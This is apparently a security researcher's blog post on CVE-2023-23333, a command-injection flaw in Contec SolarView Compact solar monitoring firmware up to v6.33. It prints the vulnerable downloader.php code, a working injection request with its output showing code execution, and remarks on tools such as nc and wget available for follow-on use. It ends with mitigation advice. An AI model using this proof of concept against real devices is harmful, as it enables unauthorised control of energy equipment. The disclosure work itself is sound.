With the heat records breaking almost every day around the globe, Solar Energy solutions are becoming rapidly main stream in households around the world. If you look in the street where you live, you will probably find a few neighbors with solar panels installed on their roof and nice little apps that can track you solar energy capacity.
Cool stuff, but as always, when connected to the Internet, you can introduce an entry point for a attacker to hack into your solar energy devices / inverters. Cyble security analysts recently published a nice report that explains the Security Gaps in Green Energy Sector: Unveiling the Hidden Dangers of Public-Facing PV Measuring and Diagnostics Solutions.

One of these energy solution providers is a Japanese company called Contec, that provides Solar Energy solutions to the market. One of their solutions, SolarView Compact has a vulnerability that allows remote code execution on a vulnerable SolarView Compact device by bypassing internal restrictions through the vulnerable endpoint downloader.php using the file parameter. Firmware versions up to v6.33 are vulnerable.

Again a very basic case of using direct system calls in your application code without sanitizing the input parameters properly.

If you analyze downloader.php, you easily can identify the vulnerable code that triggers the remote code execution with a malicious request.
You can retrieve this information by downloading the SolarView Compact firmware v600. You need to register yourself before you can download the firmware svcUpdateV600.fpk.

Run the following commands to access the firmware and extract downloader.php.

# mv svcUpdateV600.fpk svcUpdateV600.gz
# tar -ztvf./svcUpdateV600.gz html/downloader.php
-rwxr--r--  0 nobody nogroup  1986 Dec  7  2018 html/downloader.php
# tar -zxvf./svcUpdateV600.gz html/downloader.php
x html/downloader.php

// downloader.php
<?
if( isset($_REQUEST['file']) ){
    $file = $_REQUEST['file'];
}

//
function get_extend( $filename ){
    $pos = strrpos( $filename, "." );
    return substr( $filename, $pos );
}

//
//
$ext = get_extend( $file );
//
switch( $ext ){
case ".csv":
    break;
case ".jpg":
case ".jpeg":
case ".JPG":
case ".JPEG":
case ".Jpeg":
case ".Jpg":
case ".gif":
case ".GIF":
case ".Gif":
    $path = "/home/www/html/images/";
    break;
case ".zip":
    // $file is not proper sanitized !!!!
    $ARCH_FILE = sprintf("/home/contec/data/%s", $file);
    if( file_exists($ARCH_FILE) ){
        unlink($ARCH_FILE);
    }
    $cmd = sprintf("/usr/local/bin/data_zip.sh %s > /dev/null", basename($ARCH_FILE));
     // Using a direct system call can trigger the RCE !!!!
    system($cmd);
    $file = $ARCH_FILE;
    break;
}
....

A short demonstration below shows how easy it is to trigger the RCE.

Malicious burp request using curl http://TARGET-IP/downloader.php?file=%3Bid%3B.zip

GET /downloader.php?file=%3Bid%3B.zip HTTP/1.1
Host: <TARGET-IP>
User-Agent: curl/7.88.1
Accept: */*
Connection: close

Burp response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17
Content-type: text/html
Connection: close
Date: Wed, 23 Aug 2023 08:09:07 GMT
Server: lighttpd/1.4.28
Content-Length: 1072

5000 rows exported. -> /tmp/history.csv
	zip warning: name not matched: images/slide_monthly_guide.png
	zip warning: name not matched: images/slide_daily_guide.png
zip I/O error: Not a directory
zip error: Could not create output file (/home/contec/data/.zip)
uid=1001(contec) gid=0(root)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>
<HEAD>
	<META HTTP-EQUIV="Content-Type" CONTENT="text/css; charset=Shift_JIS">
	<LINK HREF="/css/style1.css" REL="stylesheet" TYPE="text/css">
	<LINK REL="SHORTCUT ICON" HREF="/favicon.ico">
	<TITLE>Error 404</TITLE>
</HEAD>
<BODY>
....

I will leave it to the readers imagination what else you can run then a simple id command, but the underlying Linux armle operating system has a nice rich command set such as nc, wget, bash, python, openssl and base64 that can be leveraged for your RCE.
And as you can see, we already get a little bonus because default the security context of the user contec, which is running the service, is part of the root group that gives us elevated privileges.

A Metasploit module is in development.
You can find the module here in my local repository or as PR 18313 at the Metasploit Github development.

Mitigation

Please update your SolarView Compact application to the latest available firmware which is v8.00 or higher.

References

SolarView Compact
Security Gaps in Green Energy Sector
CVE-2023-23333
SolarView Unauthenticated RCE – h00die-gr3y Metasploit local repository
Metasploit PR 18313

Credits

To all good fellows who raised this concern ;–)